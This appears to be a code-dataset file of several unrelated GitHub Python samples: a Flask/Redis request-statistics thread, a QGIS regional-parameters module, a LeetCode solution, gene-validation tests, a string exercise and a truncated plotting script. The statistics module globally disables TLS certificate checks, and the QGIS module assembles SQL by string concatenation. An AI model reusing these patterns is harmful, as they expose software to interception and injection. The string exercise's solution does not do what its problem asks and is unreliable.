diff --git "a/5901.jsonl" "b/5901.jsonl" new file mode 100644--- /dev/null +++ "b/5901.jsonl" @@ -0,0 +1,1528 @@ +{"seq_id":"25334504005","text":"import time\nimport ssl\nimport json\nimport functools\nimport threading\n\nimport logging as logger\nfrom queue import Queue, Empty\nfrom datetime import datetime, timedelta\n\nfrom flask import request\n\nfrom util.common_util import CommonUtil\nfrom service.redis_service import redis_client, host_name, get_running_port\n\nlogger = logger.getLogger(__name__)\n\n\ndef statistics_recognize(service_name: str):\n def decorate(func):\n @functools.wraps(func)\n def wrapper(*args, **kwargs):\n task = dict(service_name=service_name, now=datetime.now(), ip=request.remote_addr)\n logger.info('receive statistics task: {} service was called'.format(service_name))\n logger.info('request_host:%s,request.environ: %s ,request.remote_addr= %s, user_agent=%s',\n request.host, request.remote_user, request.remote_addr, request.user_agent)\n if not StatisticsThread.is_full():\n StatisticsThread.put_task(task)\n return func(*args, **kwargs)\n return wrapper\n return decorate\n\n\ndef start_daemon_thread():\n ssl._create_default_https_context = ssl._create_unverified_context\n worker = StatisticsThread()\n worker.name = 'daemon-statistics-loop'\n worker.daemon = True\n worker.start()\n\n\nclass StatisticsThread(threading.Thread):\n \"\"\"\n\n \"\"\"\n # 放外面不生效,更改\n interval = int(redis_client.hget('Deep_fashion', 'interval') or 10)\n statis_tasks_q = Queue(maxsize=1000)\n\n @classmethod\n def put_task(cls, task):\n try:\n cls.statis_tasks_q.put_nowait(task)\n except Exception as e:\n logger.error('put task to queue fail, full: {}'.format(cls.statis_tasks_q.full()))\n\n @classmethod\n def get_task(cls, timeout=None):\n return cls.statis_tasks_q.get(block=True, timeout=timeout)\n\n @classmethod\n def is_full(cls):\n return cls.statis_tasks_q.full()\n\n @property\n def qsize(self):\n return self.statis_tasks_q.qsize()\n\n # def statistics_compute(self, task_json):\n # \"\"\"\n # 延时写入,一个时间内总次数,减少Redis的访问次数\n # :param service_name:\n # :return:\n # \"\"\"\n # now = task_json.get('now', datetime.now())\n # for s, t in task_json.items():\n # self._count(s, now, t)\n\n def run(self):\n lst = []\n timer = retry = 0\n logger.info('models statistics daemon running ...')\n while True:\n try:\n try:\n task = self.get_task(timeout=0.01)\n except Empty as e:\n logger.error('Error in get_task from Queue: %s', e)\n timer += 2\n time.sleep(timer if timer < 50 else 50)\n else:\n lst.append(task)\n timer = 0\n\n now = datetime.now()\n logger.debug('lst=%s,now.minute %sinterval=%s' % (len(lst), now.minute, now.minute % self.interval == 0))\n # if now.minute % self.interval == 0 and lst or len(lst) > 1000 or timer > 600: # timer没有意义\n if now.minute % self.interval == 0 and lst or len(lst) > 1000:\n # 三种情况:正常-时间间隔和快-累积量,慢的话就阻塞时间\n if self.qsize > 0 and timer == 0 and retry < 900:\n # 确保出发处理略过的是累计的任务,\n retry += 1\n continue\n logger.info('handle task: {}'.format(len(lst)))\n self.test_count(lst)\n self.refresh_interval()\n lst.clear()\n timer = retry = 0\n time.sleep(60)\n except Exception as e:\n logger.exception('exception: {}'.format(CommonUtil.get_exception_info()))\n logger.info('Error,handwriting=%s', e)\n\n @classmethod\n def test_count(cls, lst):\n \"\"\"\n 感觉增加了一个缓存写入,复杂度上升了一个级别\n :param lst:\n :return:\n \"\"\"\n result = {}\n now = lst[0].get('now')\n end_now = lst[-1].get('now')\n # 临界的时间,没有处理,第二天开始的统计,会被加到第一天\n if end_now.day != now.day:\n 
result.update({datetime.strftime(end_now, '_%Y-%m-%d'): {}})\n\n result.update({datetime.strftime(now, '_%Y-%m-%d'): {}})\n logger.info('lst: %s', len(lst))\n\n for task in lst:\n # 统计各时间间隔的频次\n service_name = task.get('service_name')\n ip = task.get('ip')\n now = task.get('now')\n now_while = str((now.minute // cls.interval) * cls.interval).zfill(2)\n next_while = (now.minute // cls.interval + 1) * cls.interval\n # todo 对应的统计处该为[1],换成时间间隔后一节点会出现跨区问题,也就是12:60应该写成1:00,\n # 也就是会有个进位时间间隔换成时间点本身就不太合适\n next_while = str(next_while if next_while <= 60 else 60).zfill(2)\n now_tm = datetime.strftime(now, '_%Y-%m-%d')\n period = '%d:%s-%d:%s' % (now.hour, now_while, now.hour, next_while)\n tem_result = result.get(now_tm)\n\n if service_name not in tem_result.keys():\n tem_result.update({service_name: {}})\n service_dic = tem_result.get(service_name)\n if ip not in service_dic.keys():\n service_dic.update({ip: {}})\n ip_statistic = service_dic.get(ip)\n ip_statistic[period] = ip_statistic[period]+1 if ip_statistic.get(period) else 1\n\n logger.info('service count:%s', result)\n port = get_running_port()\n node = host_name + ':' + str(port)\n\n for now_ts, dic in result.items():\n for service_name, service_dic in dic.items():\n hash_table = service_name + now_ts\n node_statis = redis_client.hget(hash_table, node, ) or str({})\n logger.debug('node_statis %s', node_statis)\n redis_preiod_dic = json.loads(node_statis)\n\n for ip_name, ip_dic in service_dic.items():\n redis_ip_dic = redis_preiod_dic.get(ip_name)\n if redis_ip_dic:\n for k, v in ip_dic.items():\n redis_ip_dic[k] = (redis_ip_dic.get(k) or 0) + v\n else:\n redis_preiod_dic.update({ip_name: ip_dic})\n print('redis_preiod_dic', redis_preiod_dic)\n redis_client.hset(hash_table, node, json.dumps(redis_preiod_dic))\n redis_client.expire(hash_table,timedelta(days=30))\n logger.info('hash_table: {}, field: {}, new_dic: {}'.format(hash_table, node, service_dic))\n\n def refresh_interval(self):\n self.interval = int(redis_client.hget('Deep_fashion', 'interval') or 10)\n logger.info('Interval was refresh,interval={}'.format(self.interval))\n","repo_name":"guanfeix/tem_image_filter","sub_path":"util/statistics.py","file_name":"statistics.py","file_ext":"py","file_size_in_byte":7144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"2037877464","text":"from __future__ import absolute_import\nfrom builtins import map\nfrom builtins import str\nfrom builtins import range\nfrom builtins import object\nfrom datetime import datetime\n\nfrom qgis.PyQt.QtCore import QSettings\nfrom qgis.core import QgsDataSourceUri\nfrom .DataManagement.SpatialAttributesSampler import SpatialAttributesSampler\nfrom .DataManagement.spatialHelpers import *\nfrom .DataManagement.LookupLogger import LookupLogger\nimport sqlite3 as lite\nfrom calendar import isleap\ndef addQuotes(x): return \"'\" + x + \"'\"\n\nclass RegionalParameters(object):\n # Translate spatially and temporally resolved country-specific parameters to model output polygons. 
Samples values\n # rather than downscaling them.\n # Parameters: Times of waking, sleeping and duration over which sleep/wake transition occurs; economic status rating; summer cooling\n # Provides a value for every output feature.\n # Parameters MUST have a set attribute names: t_sleep, t_wake, transition, ecostatus, smrcooling\n def __init__(self, logger=LookupLogger()):\n self.logger = logger\n self.worldAttributes = SpatialAttributesSampler(logger)\n self.dburi = None # Database URI\n self.dbschema = None # Database schema containing table(s) of interest\n self.dbtable = None # Database table containing world features\n self.databaseLocation = None # File containing sqlite database\n\n self.templateShapefile = None\n self.templateEpsgCode = None\n self.outputLayer = None # actual qgsVectorLayer representing output layer\n self.countryAssignments = None # Pandas series containing the country assigned to each ID used in the output layer\n\n # Store raw values from database\n self.attrs = None\n self.wdBuildingCycles = None\n self.weBuildingCycles = None\n self.wdTransportCycles = None\n self.weTransportCycles = None\n self.weekendDays = None\n self.fixedHolidays = None\n # Placeholders for populations. Note population is used to disaggregate national totals, which are per person.\n self.resPops = None # Residential populaton in buildings\n self.vehPop = None # Effective population in vehicle emitting areas\n self.metabPop = None # Residential population in metabolism-friendly areas\n\n # set new QGIS project layers (created herein) to inherit the project EPSG code (initially) to avoid annoying popups\n s = QSettings()\n s.setValue(\"/Projections/defaultBehaviour\", \"useProject\")\n\n # SETTERS\n def setWorldDatabase(self, database):\n '''Sets the world database\n :param database: Local database file (hard coded properties are used in this function)\n :return: Nothing (stores self.attributedOutputLayer, which contains assignments)\n '''\n\n if not os.path.exists(database):\n raise ValueError('LQF Database file ' + database + ' not found')\n self.databaseLocation = database\n self.dburi = QgsDataSourceUri()\n self.dburi.setDatabase(database)\n self.dbschema = ''\n self.dbtable = 'World'\n\n def setOutputShapefile(self, filename, epsgCode, id_field=None):\n '''\n Sets output areas for object and assigns country ID to each of them (takes a long time if many features)\n :param filename: Shapefile filename\n :param epsgCode: EPSG code (int)\n :param id_field: Name of field/attribute containing unique feature IDs\n :return: Filename of shapefile with country assignments added\n '''\n self.worldAttributes.setOutputShapefile(filename, epsgCode, id_field)\n\n if self.dburi is None:\n raise ValueError('setWorldDatabase() must be called first')\n\n # Get output area's overall bounding box\n self.worldAttributes.outputLayer.selectAll()\n bbox = self.worldAttributes.outputLayer.boundingBoxOfSelected()\n # Get a layer that includes just the countries intersecting and containing the bbox of the output areas\n\n # Return the geometries of matching countries, converted to the same CRS as the output\n sql = \"(select admin, geom, ST_Transform( geom , \" + str(self.worldAttributes.templateEpsgCode) + \" ) as transformed_geom FROM \" + self.dbtable + \")\"\n geom_column = 'transformed_geom'\n\n # The following statement converts the bbox of our output area to EPSG 4326, and finds countries that intersect this\n polygonText = \"ST_Intersects(ST_Transform(SetSRID(GeomFromText('%s'), %s), 4326), geom)\"% 
(bbox.asWktPolygon(), str(self.worldAttributes.templateEpsgCode))\n\n # E.g the following query selects greece\n #SELECT name FROM World WHERE ST_Intersects(ST_Transform(SetSrid(GeomFromText(\"POLYGON((309045.14839637035038322 3892853.22750130295753479, 345275.02064901700941846 3892853.22750130295753479, 345275.02064901700941846 3926290.0938413473777473, 309045.14839637035038322 3926290.0938413473777473, 309045.14839637035038322 3892853.22750130295753479))\"), 32635), 4326), geom)\n self.dburi.setDataSource(self.dbschema, sql, geom_column, polygonText)\n vlayer = QgsVectorLayer(self.dburi.uri(), \"Matched countries\", 'spatialite')\n # Build list of country names\n vlayer.selectAll()\n countries = []\n for f in vlayer.getFeatures():\n countries.append(f['admin'])\n\n # Connect to SpatiaLite database\n con = None\n con = lite.connect(self.databaseLocation)\n self.extractPropertiesForCountries(con, countries)\n # Create a list of DOYs for each country and put into dataframe\n\n # Assign country name to output areas\n # Take a temporary local copy of the world map to prevent going back to the database every time a feature is looke dup\n fobj,tempLayerFile = tempfile.mkstemp('.shp')\n os.close(fobj)\n saveLayerToFile(vlayer, tempLayerFile, vlayer.crs())\n\n tl = loadShapeFile(tempLayerFile, 4326)\n self.attributedOutputLayer = self.worldAttributes.resampleLayer(tl, ['admin'], inputIdField='admin')\n tl = None\n vlayer = None\n try:\n os.remove(tempLayerFile) # Delete temporary file\n except:\n pass\n\n # Assign this population as vehicle, residential and metabolisng population data frames\n # This can be overriden later to inject specific distributions for the population types\n df = shapefile_attributes(self.attributedOutputLayer)\n df.index = list(map(intOrString, df[self.worldAttributes.templateIdField]))\n self.countryAssignments = df\n\n return self.attributedOutputLayer # This should be saved so it can be used with self.injectSampledLayer to save time later\n\n def injectMetabPopLayer(self, filename, epsgCode):\n '''\n Inject a population shapefile that shows the distribution of the metabolising population.\n The features must be identical to those in the output layer\n :param filename: Shapefile path\n :param epsgCode: EPSG of shapefile\n :return: Nothing. Assigns object properties\n '''\n lyr = openShapeFileInMemory(filename, epsgCode, 'temp layer')\n ser = shapefile_attributes(lyr)\n ser.index = list(map(intOrString, ser[self.worldAttributes.templateIdField]))\n self.metabPop = ser['Pop']\n lyr = None\n\n def injectVehPopLayer(self, filename, epsgCode):\n '''\n Inject a population shapefile that shows the distribution of the vehicle population.\n The features must be identical to those in the output layer\n :param filename: Shapefile path\n :param epsgCode: EPSG of shapefile\n :return: Nothing. Assigns object properties\n '''\n lyr = openShapeFileInMemory(filename, epsgCode, 'temp layer')\n ser = shapefile_attributes(lyr)\n ser.index = list(map(intOrString, ser[self.worldAttributes.templateIdField]))\n self.vehPop = ser['Pop']\n lyr = None\n\n def injectResPopLayer(self, filename, epsgCode):\n '''\n Inject a population shapefile that shows the distribution of the residential population.\n The features must be identical to those in the output layer\n :param filename: Shapefile path\n :param epsgCode: EPSG of shapefile\n :return: Nothing. 
Assigns object properties\n '''\n lyr = openShapeFileInMemory(filename, epsgCode, 'temp layer')\n ser = shapefile_attributes(lyr)\n ser.index = list(map(intOrString, ser[self.worldAttributes.templateIdField]))\n self.resPops = ser['Pop']\n lyr = None\n\n def injectAttributedOutputLayer(self, filename, epsgCode, id_field=None):\n '''\n Sets output areas for object and assigns country ID to each of them (takes a long time if many features)\n :param database: Local database file (hard coded properties are used in this function)\n :return: Nothing (stores self.attributedOutputLayer, which contains assignments)\n '''\n self.worldAttributes.setOutputShapefile(filename, epsgCode, id_field)\n self.attributedOutputLayer = openShapeFileInMemory(filename, epsgCode, 'attributed output areas')\n if self.dburi is None:\n raise ValueError('setWorldDatabase() must be called first')\n\n # Unlike setOutputShapefile(), this already has the required country ID in the 'admin' field\n # so no need to do spatial indexing\n df = shapefile_attributes(self.attributedOutputLayer)\n if 'admin' not in df.columns:\n raise ValueError('A valid attributed output layer must have the field \"admin\" in it.')\n\n countries = df['admin'].dropna().unique()\n\n df = None\n # Connect to SpatiaLite database and populate object with country-specific attributes and holidays\n con = None\n con = lite.connect(self.databaseLocation)\n self.extractPropertiesForCountries(con, countries)\n ca = shapefile_attributes(self.attributedOutputLayer)\n ca.index = list(map(intOrString, ca[self.worldAttributes.templateIdField]))\n self.countryAssignments = ca\n\n def extractPropertiesForCountries(self, con, countries):\n '''\n Pull all country-specific data from database and put into pandas dataframe with appropriate indexing.\n :param con: Database connection object (SQLIte)\n :param countries: list of countries for which to get data\n :return: Nothing. 
Populates object fields instead.\n '''\n # All years are taken here, and accounted for upon this objected being queried\n attrs = \"SELECT * FROM attributes WHERE id IN \" + \"(\" + ','.join(map(addQuotes, countries)) + \") ORDER BY as_of_year ASC\"\n self.attrs = pd.read_sql(attrs, con, index_col=['id', 'as_of_year'])\n\n # Weekend and weekday building diurnal cycles for each country\n wdBuildingCycles = \"SELECT * FROM weekdayBuildingCycles WHERE id IN \" + \"(\" + ','.join(map(addQuotes, countries)) + \")\"\n self.wdBuildingCycles = pd.read_sql(wdBuildingCycles, con, index_col=['id']) # Column names are 1...24\n diffs = set(countries).difference(list(self.wdBuildingCycles.index))\n if len(diffs) > 0:\n raise Exception('The LQF database contains no weekday building cycles for: ' + str(diffs))\n\n weBuildingCycles = \"SELECT * FROM weekendBuildingCycles WHERE id IN \" + \"(\" + ','.join(map(addQuotes, countries)) + \")\"\n self.weBuildingCycles = pd.read_sql(weBuildingCycles, con, index_col=['id']) # Column names are 1...24\n diffs = set(countries).difference(list(self.weBuildingCycles.index))\n if len(diffs) > 0:\n raise Exception('The LQF database contains no weekend building cycles for: ' + str(diffs))\n\n # Weekend and weekday transport diurnal cycles for each country\n wdTransportCycles = \"SELECT * FROM weekdayTransportCycles WHERE id IN \" + \"(\" + ','.join(map(addQuotes, countries)) + \")\"\n self.wdTransportCycles = pd.read_sql(wdTransportCycles, con, index_col=['id']) # Column names are 1...24\n diffs = set(countries).difference(list(self.wdTransportCycles.index))\n if len(diffs) > 0:\n raise Exception('The LQF database contains no weekday transport cycles for: ' + str(diffs))\n\n weTransportCycles = \"SELECT * FROM weekendTransportCycles WHERE id IN \" + \"(\" + ','.join(map(addQuotes, countries)) + \")\"\n self.weTransportCycles = pd.read_sql(weTransportCycles, con, index_col=['id']) # Column names are 1...24\n diffs = set(countries).difference(list(self.weTransportCycles.index))\n if len(diffs) > 0:\n raise Exception('The LQF database contains no weekend transport cycles for: ' + str(diffs))\n\n weekendDays = \"SELECT * FROM weekendDays WHERE id IN \" + \"(\" + ','.join(map(addQuotes, countries)) + \")\"\n self.weekendDays = pd.read_sql(weekendDays, con, index_col=['id']) # Column names are Mon, Tue...\n diffs = set(countries).difference(list(self.weekendDays.index))\n if len(diffs) > 0:\n raise Exception('The LQF database contains no list of weekday/weekend days for: ' + str(diffs))\n\n # Get fixed holiday day of years (assuming not leap year)\n fixedHols = \"SELECT * FROM fixedholidays WHERE id IN \" + \"(\" + ','.join(map(addQuotes, countries)) + \")\"\n fixedHols = pd.read_sql(fixedHols, con)\n self.fixedHolidays = {c: list(fixedHols['DOY'].loc[fixedHols['id'] == c]) for c in countries}\n\n\n ## GETTERS\n def getNationalAttributes(self, year):\n '''\n Retrieve national data for the specified year for the country(ies) intersected by the output layer.\n When the requested year is not available, the most recent match is used.\n If there is no most recent match, an exception is thrown\n :param year: Int: Year represented by data.\n :return: Dict of attributes: {country: {attrib: val}}.\n '''\n\n if type(year) is not int:\n raise ValueError('Year must be an integer year between 1000 and 3000')\n\n if (year < 1000) or (year > 3000):\n raise ValueError('Year must be an integer year between 1000 and 3000')\n\n # Retrieve national data for country and year\n countries = 
self.weTransportCycles.index.unique() # Purely for the primary key\n\n # Get most up-to-date data for this country in this period\n cols = ['population', 'kwh_year', 'wakeTime', 'sleepTime', 'transition', 'summer_cooling', 'ecostatus','cars', 'motorcycles', 'freight']\n arr = pd.DataFrame(index = countries, columns = cols)\n for c in countries:\n # Get scalars first\n arr[:].loc[c] = pd.Series({'population' : self.attrs['population'][c].dropna().asof(year),\n 'kwh_year' : self.attrs['kwh_year'][c].dropna().asof(year),\n 'wakeTime' : self.attrs['wake_hour'][c].dropna().asof(year),\n 'sleepTime' : self.attrs['sleep_hour'][c].dropna().asof(year),\n 'transition' : self.attrs['transition_time'][c].dropna().asof(year),\n 'summer_cooling' : self.attrs['summer_cooling'][c].dropna().asof(year),\n 'ecostatus' : self.attrs['ecostatus'][c].dropna().asof(year),\n 'cars' : self.attrs['cars'][c].dropna().asof(year),\n 'motorcycles' : self.attrs['motorcycles'][c].dropna().asof(year),\n 'freight' : self.attrs['freight'][c].dropna().asof(year)})\n # Keep track of what value provided for each country and year\n attrNames = ['population', 'kwh_year', 'wake_hour', 'sleep_hour', 'transition_time', 'summer_cooling', 'ecostatus', 'cars', 'motorcycles', 'freight']\n for attrName in attrNames:\n lookedUp = self.attrs[attrName][c].dropna().asof(year)\n yearLookedUp = self.attrs[attrName][c].dropna().index.asof(year)\n self.logger.addEvent('National attribute', None, None, None, 'DB value for %s %s in modelled year %d: %s (%d value)'%(c, attrName, year, str(lookedUp), yearLookedUp))\n\n if not pd.Series(arr[:].loc[c]).notnull().all():\n raise Exception('Cannot model ' + c + ' in year ' + str(year) + ' because there is not enough nation-level information up to this period')\n\n return arr\n\n def isWeekend(self, featureIds, date):\n '''\n Given a particular date and country, gives True or False to answer \"Is it the weekend?\"\n :param featureIds: list or pd.index of feature IDs\n :param date: datetime (UTC)\n :return: True (it's the weekend) or False (it's a weekday)\n '''\n # Get list of 1 or 0 with no index.\n days = self.countryAssignments.loc[featureIds].join(self.weekendDays[['Mon', 'Tue', 'Wed', 'Thu', 'Fri','Sat', 'Sun']], on='admin')[['Mon', 'Tue', 'Wed', 'Thu', 'Fri','Sat', 'Sun']]\n days.columns = list(range(0,7))\n return days[date.weekday()] > 0\n\n def getWeekendDaysByRegion(self):\n '''\n :return: dict of {country: [int, int]} that shows which days of the week (0-6 = Monday-Sunday) are weekend days\n '''\n tempDays = self.weekendDays[['Mon', 'Tue', 'Wed', 'Thu', 'Fri','Sat', 'Sun']]\n tempDays.columns = list(range(7))\n return {idx: tempDays.columns[tempDays.loc[idx] > 0] for idx in tempDays.index}\n\n # def getCyclesForFeatureIDs(self, featureIds, weekend):\n # '''\n # Get the 24-hour diurnal cycle of energy use for the specified feature IDs\n # :param featureIds: list or pd.index of feature IDs\n # :param weekend: pd.Series of true or false describing if it is the weekend (true) or weekday (false) at each feature ID\n # :return: pd.dataframe with 25 columns: Country name and hour of day. 
Each represents the preceding hour\n # '''\n #\n # # Get all weekday cycles\n # vals = self.countryAssignments.loc[featureIds].join(self.weekendCycles, on='admin')\n # # Overwrite with weekend versions if needed#\n #\n # weekendIndices = weekend.index[weekend]\n # vals[:].loc[weekendIndices] = self.countryAssignments.loc[weekendIndices].join(self.weekendCycles, on='admin')\n # return vals\n\n def getTransportCycles(self, weekend):\n '''\n Get all transport diurnal cycles for the countries overlapped by the features in the output layer\n :param weekend: Return weekend cycle (True) or weekday (False)\n :return: pd.DataFrame with 24 columns (1 for each hour) indexed by country name\n '''\n if weekend:\n return self.weTransportCycles\n else:\n return self.wdTransportCycles\n\n def getBuildingCycles(self, weekend):\n '''\n Get all building diurnal cycles for the countries overlapped by the features in the output layer\n :param weekend: Return weekend cycle (True) or weekday (False)\n :return: pd.DataFrame with 24 columns (1 for each hour) indexed by country name\n '''\n if weekend:\n return self.weBuildingCycles\n else:\n return self.wdBuildingCycles\n\n def getOutputLayer(self):\n # Gets the output layer\n if self.worldAttributes.outputLayer is not None:\n return self.worldAttributes.outputLayer\n else:\n raise Exception('The output layer has not yet been set!')\n\n def getAttribsTable(self, featureId, requestYear):\n '''\n Get pandas data frame of attributes for each output feature on requested date\n :param featureId: Pandas series of feature Id(s) for which to return attributes (non-matching ones get NA)\n :param requestYear: DateTime object containing requested date\n :return: pandas data frame indexed by chosen unique identifier of each output area\n '''\n if type(featureId) is pd.Index:\n featureId = featureId.tolist()\n\n # Country assignments\n # This can be overriden later to inject specific distributions for the population types\n countryAssignments = shapefile_attributes(self.attributedOutputLayer)\n countryAssignments.index = list(map(intOrString, countryAssignments[self.worldAttributes.templateIdField]))\n\n # Get national attributes for each country\n attrs = self.getNationalAttributes(requestYear)\n # Combine the populations\n allPops = pd.concat([countryAssignments['admin'], self.resPops, self.vehPop, self.metabPop], axis=1)\n allPops.columns = ['admin','resPop', 'vehPop', 'metabPop']\n # Join list of names to national attributes\n attrs = allPops[:].loc[featureId].join(attrs, on='admin')\n return attrs\n\n def getEnergyUse(self, featureId, requestYear):\n '''\n Return kwh per year used in each output area\n :param featureId:\n :param requestYear:\n :return:\n '''\n # Get national energy consumption associated to each output area\n # Multiply it by fraction of population in this output area\n data = self.getAttribsTable(featureId, requestYear)\n return data['kwh_year'] * data['resPop']/data['population'] # Disaggregate energy use by building borne population\n\n def getVehCount(self, featureId, requestYear):\n '''\n Return vehicle counts per year used in each output area\n :param featureId:\n :param requestYear:\n :return:\n '''\n data = self.getAttribsTable(featureId, requestYear)\n # Vehicle counts in DB are vehicles per 1,000 people, so this is calculated per populated area by counting the local pop in 1000s\n return (data[['cars', 'motorcycles', 'freight']].transpose() * data['vehPop']/1000).transpose() # Disaggregate by vehicle \"population\"\n\n def getMetabPop(self, 
featureId, requestYear):\n '''\n Return population spread across \"metabolism friendly\" areas e.g. parks and streets as well as buildings\n :param featureId:\n :param requestYear:\n :return:\n '''\n data = self.getAttribsTable(featureId, requestYear)\n # Vehicle counts in DB are vehicles per 1,000 people, so this is calculated per populated area by counting the local pop in 1000s\n return data['metabPop'] # It's just the number of people in each feature ID\n\n def getFixedHolidays(self, startDate, endDate):\n '''\n Returns a list of fixed public holidays between the specified datetime objects\n :param startDate: datetime: First day to include in range\n :param endDate: datetime: Final day to include in range\n :return: dict: {countryName: [holidays]}: each entry in dict is list of datetime.date objects containing the holidays.\n '''\n if endDate < startDate:\n raise ValueError('End date is earlier than start date')\n\n def doyToLeapDatetime(x, year):\n return datetime.strptime(str(year)+str(x+1 if (x > 59) and isleap(year) else x), '%Y%j').date()\n output = {}\n for c in list(self.fixedHolidays.keys()):\n output[c] = []\n for y in range(startDate.year, endDate.year+1):\n null = [output[c].append(doyToLeapDatetime(d, y)) for d in self.fixedHolidays[c]]\n\n return output\n\n def getDominantCountry(self):\n ''' Returns the dominant country: the one that intersects the largest number of output features. '''\n\n return self.countryAssignments['admin'].dropna().value_counts().sort_values(ascending=False).index[0]","repo_name":"UMEP-dev/UMEP","sub_path":"LucyQF/PythonLUCY/RegionalParameters.py","file_name":"RegionalParameters.py","file_ext":"py","file_size_in_byte":23652,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"27"} +{"seq_id":"10337998799","text":"class Solution:\n def maxProfit(self, prices: List[int]) -> int:\n idx_min = 0\n min_p = 10000\n profit = 0\n for idx, p in enumerate(prices):\n iter_profit = 0\n if p < min_p:\n min_p = p\n idx_min = idx\n if p > min_p:\n iter_profit = p-min_p\n if iter_profit>profit: profit = iter_profit\n return profit","repo_name":"prasadgola/Leetcode","sub_path":"maxstock.py","file_name":"maxstock.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"18590469670","text":"import pytest\n\nfrom larval_gonad.validation import GeneValidator\n\n\n@pytest.mark.parametrize(\n \"lit,missing,biomarkers,zscores,flag_protein,expected_score\",\n [\n # Fours: Lit Gene matches BioMarkers\n ## in situ\n ({\"G\"}, set(), {\"G\"}, set(), False, 4),\n ({\"G\", \"EPS\"}, set(), {\"G\", \"EPS\"}, set(), False, 4),\n ({\"G\", \"EPS\"}, {\"MPS\", \"EC\"}, {\"G\", \"EPS\", \"MPS\"}, set(), False, 4),\n ## protein expression\n ({\"G\"}, set(), {\"G\"}, set(), True, 4),\n ({\"EPS\"}, set(), {\"G\"}, set(), True, 4),\n ({\"G\", \"EPS\"}, set(), {\"G\", \"EPS\"}, set(), True, 4),\n ({\"EPS\", \"MPS\", \"LPS\"}, set(), {\"G\", \"EPS\"}, set(), True, 4),\n ({\"C2\"}, set(), {\"C1\"}, set(), True, 4),\n ({\"C1\", \"C2\", \"C3\"}, set(), {\"C1\", \"C2\"}, set(), True, 4),\n\n # Threes: Lit Gene matches Upper Quantile of Zscores\n ## in situ\n ({\"G\"}, set(), set(), {\"G\"}, False, 3),\n ({\"G\", \"EPS\"}, set(), set(), {\"G\", \"EPS\"}, False, 3),\n ({\"G\", \"EPS\"}, {\"MPS\", \"EC\"}, set(), {\"G\", \"EPS\", \"MPS\"}, False, 3),\n ## protein expression\n ({\"G\"}, set(), set(), {\"G\"}, True, 3),\n ({\"EPS\"}, set(), set(), {\"G\"}, True, 
3),\n ({\"G\", \"EPS\"}, set(), set(), {\"G\", \"EPS\"}, True, 3),\n ({\"EPS\", \"MPS\", \"LPS\"}, set(), set(), {\"G\", \"EPS\"}, True, 3),\n ({\"C2\"}, set(), set(), {\"C1\"}, True, 3),\n ({\"C1\", \"C2\", \"C3\"}, set(), set(), {\"C1\", \"C2\"}, True, 3),\n\n # Twos: Lit Gene matches Lineage Biomarkers\n ## in situ\n ({\"G\", \"EPS\"}, set(), {\"G\", \"EPS\", \"MPS\"}, set(), False, 2),\n ({\"C1\", \"C4\"}, set(), {\"C1\", \"C2\", \"C3\"}, set(), False, 2),\n ({\"EPS\", \"MPS\", \"LPS\", \"P\"}, set(), {\"EPS\"},set(), False, 2),\n\n ## protein expression\n ({\"C1\", \"C2\"}, set(), {\"C1\", \"C2\", \"C3\"}, set(), True, 2),\n ({\"G\", \"EPS\"}, set(), {\"EPS\", \"MPS\"}, set(), True, 2),\n ({\"G\", \"EPS\", \"MPS\", \"P\"}, set(), {\"EPS\", \"MPS\"}, set(), True, 2),\n ({\"G\", \"EPS\", \"MPS\"}, set(), {\"EPS\", \"MPS\", \"P\"}, set(), True, 2),\n\n # Ones: Lit Gene matches Lineage Zscores\n ## in situ\n ({\"G\", \"EPS\"}, set(), set(), {\"G\", \"EPS\", \"MPS\"}, False, 1),\n ({\"C1\", \"C4\"}, set(), set(), {\"C1\", \"C2\", \"C3\"}, False, 1),\n ({\"EPS\", \"MPS\", \"LPS\", \"P\"}, set(), set(), {\"EPS\"}, False, 1),\n ## protein expression\n ({\"G\", \"EPS\"}, set(), set(), {\"G\", \"EPS\", \"MPS\"}, True, 1),\n\n # No class\n (set(), {\"G\"}, set(), set(), False, None),\n ## in situ\n ({\"G\"}, set(), set(), set(), False, None),\n ## protein expression\n ({\"G\"}, set(), set(), set(), True, None),\n ],\n)\ndef test_GeneValidator(lit, missing, biomarkers, zscores, flag_protein, expected_score):\n gene = GeneValidator(\"gene1\", lit, missing, biomarkers, zscores, flag_protein)\n assert gene.score == expected_score\n","repo_name":"jfear/larval_gonad","sub_path":"src/tests/test_validation.py","file_name":"test_validation.py","file_ext":"py","file_size_in_byte":2838,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"31047364703","text":"\"\"\"\nAuthor: Le Tuan Luc\nDate: 2021/07/20\nProgram: exercise_04_page_85.py\nProblem:\n Assume that the variables x and y refer to strings. Write a code segment that prints these strings in alphabetical order. 
You should assume that they are not equal.\nSolution:\n >>>\n\"\"\"\nx = 'hello'\ny = 'world'\n\ndef alphabetical_order(string):\n string_temp = []\n for character in string:\n string_temp.append(character)\n\n for i in range(0, len(string)):\n for j in range(0, len(string)):\n if string_temp[i] < string_temp[j]:\n temp_character = string_temp[i]\n string_temp[i] = string_temp[j]\n string_temp[j] = temp_character\n\n string_output = \"\"\n for character in string_temp:\n string_output += character\n\n return string_output\n\nprint(alphabetical_order(x+y))\n ","repo_name":"FxLuc/python","sub_path":"chapter03/page_85/exercise_04_page_85.py","file_name":"exercise_04_page_85.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"40480747984","text":"import matplotlib.pyplot as plt\n\nx_axis_labels = []\npreprocessing_points = []\nprocessing_points = []\nmemory_points = []\nduration_points = []\nwith open('results.csv') as f:\n f.readline()\n for line in f:\n row = line.split(',')\n x_axis_labels.append(int(row[0]))\n preprocessing_points.append(float(row[1]))\n processing_points.append(float(row[2]))\n memory_points.append(float(row[3]))\n duration_points.append(int(row[4]))\n\n# Plot the data for left axis\nfig, ax1 = plt.subplots()\nax1.set_xticks(x_axis_labels)\nax1.set_ylim([4500,7000])\nax1.plot(x_axis_labels, processing_points, '-ro', label='Processing Time')\n#ax1.plot(x_axis_labels, duration_points, '-bs', label='Duration')\n#plot the data for right axis\nax2 = ax1.twinx()\nax2.set_ylim([100,275])\nax2.plot(x_axis_labels, memory_points, '-g^', label='Memory')\n# apply labels and legend\nax1.set_xlabel('Parameter 